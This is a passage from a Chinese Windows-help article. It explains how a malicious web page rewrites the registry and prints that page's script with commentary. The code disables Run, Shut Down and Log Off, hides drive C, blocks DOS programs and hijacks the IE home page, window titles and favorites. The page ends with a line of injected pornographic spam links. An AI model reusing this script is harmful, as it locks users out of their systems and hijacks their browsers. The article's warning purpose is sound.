當(dāng)前位置 : 首頁>軟件學(xué)院>操作系統(tǒng)>注冊表>正文

瀏覽網(wǎng)頁注冊表被修改之迷及解決辦法

http://m.yibo1263.com　2008/4/26 22:57:16 　來源:不詳　編輯:葉子

進(jìn)入該網(wǎng)頁會被：

　　1.修改開始菜單

　　1）禁止“關(guān)閉系統(tǒng)”

　　2）禁止“運行”

　　3）禁止“注銷”

　　2.隱藏C盤——你的C盤找不到了

　　3.禁止使用注冊表編輯器regedit

　　4.禁止使用DOS程序

　　5.使系統(tǒng)無法進(jìn)入“實模式”

　　6.禁止運行任何程序

　　7.將IE瀏覽器的首頁改為http://www.findfeel.com/，收藏夾中也被加入該網(wǎng)址。

　　那么這些功能恐怖的功能是如何實現(xiàn)的呢？原來，該網(wǎng)頁是有人利用Java技術(shù)制作的含有有害代碼的ActiveX網(wǎng)頁文件。為讓更多的人了解其危害，我查看了其源代碼，將其主要部分列了出來，并加了詳細(xì)的注釋（文中有“注”字的部分是我加的注釋）。

　　注：下面代碼是將你的IE默認(rèn)連接首頁改為http://www.findfeel.com/

　　Shl.RegWrite （"HKCUSoftwareMicrosoftInternet ExplorerMainStart Page", "http://www.findfeel.com/"）;

　　注：以下是該網(wǎng)頁修改受害者的注冊表項所用的招數(shù)

　　Shl.RegWrite （"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun", 01, "REG_BINARY"）;

　　注：使受害者系統(tǒng)沒有“運行”項，這樣用戶就不能通過注冊表編輯器來修改該有害網(wǎng)頁對系統(tǒng)注冊表的修改。

　　Shl.RegWrite （"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose", 01, "REG_BINARY"）;

　　注：使受害者系統(tǒng)沒有“關(guān)閉系統(tǒng)”項

　　Shl.RegWrite （"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff", 01, "REG_BINARY"）;

　　注：使受害者系統(tǒng)沒有“注銷”項

　　Shl.RegWrite （"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives", "00000004", "REG_DWORD"）;

　　注：使受害者系統(tǒng)沒有邏輯驅(qū)動器C

　　Shl.RegWrite （"HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp Disabled","REG_BINARY"）;

　　注：禁止運行所有的DOS應(yīng)用程序；

　　Shl.RegWrite （"HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies WinOldAppNoRealMode","REG_BINARY"）;

　　注：使系統(tǒng)不能啟動到“實模式”（傳統(tǒng)的DOS模式）下；

　　又注：進(jìn)入該網(wǎng)頁，它還會修改以下的注冊表項，使WINDOWS系統(tǒng)登錄時顯示一個登錄窗口（在MicroSoft網(wǎng)絡(luò)用戶登錄之前）

　　Shl.RegWrite （"HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption", "嗚啦啦..."）;

　　注：這些代碼會使窗口的標(biāo)題是“嗚啦啦…”

　　Shl.RegWrite （"HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText", "歡迎你！你這個超級無敵大白癡！《嗚啦啦...》故事開始了，按確定進(jìn)入悲慘世界"）;

　　注：上面一行是會在窗口中顯示出來的文字

　　注：下面兩行代碼修改注冊表，使受害者所有的IE窗口都加上以下的標(biāo)題：“嗚啦啦…”

　　Shl.RegWrite （"HKLMSoftwareMicrosoftInternet ExplorerMainWindow Title", "嗚啦啦..."）; Shl.RegWrite （"HKCUSoftwareMicrosoftInternet ExplorerMainWindow Title", "嗚啦啦..."）;

　　注：到上面一行為止，完成了對受害者的注冊表的所有修改！

　　注：下面代碼用來將其網(wǎng)頁增加到受害者的收藏夾中

　　var WF, Shor, loc; WF = FSO.GetSpecialFolder（0）; loc = WF + "Favorites"; if（!FSO.FolderExists（loc）） { loc = FSO.GetDriveName（WF） + "Documents and Settings" + Net.UserName + "Favorites"; if（!FSO.FolderExists（loc）） { return; } }

注：下面就是使其網(wǎng)頁加入到你的收藏夾的具體代碼

　　AddFavLnk（loc, "找到感覺www.findfeel.com", http://www.findfeel.com）;

本新聞共6頁,當(dāng)前在第3頁 1 2 3 4 5 6

【收藏】【打印】【進(jìn)入論壇】

相關(guān)文章：

·win 注冊表全解開始菜單及相關(guān)設(shè)置

·運用注冊表給系統(tǒng)應(yīng)用程序加口令

·由注冊表怎么防御黑客如入侵

·修改注冊表實現(xiàn)Win 7系統(tǒng)自動撥號

·修改注冊表讓你在局域網(wǎng)中隱身

·用注冊表恢復(fù)“碎片整理”按鈕功能

·從注冊表切斷一切黑客入侵的路徑

·非windows環(huán)境下編輯注冊表的方法

·修改注冊表權(quán)限加強對木馬病毒防范

·讓登錄注冊表時保持在根目錄狀態(tài)

·注冊表或組策略解決任務(wù)管理器問題

亚洲AV无码乱码在线观看不卡|最新大伊香蕉精品视频在线|亚洲不卡av一区二区|国产美女无遮挡免费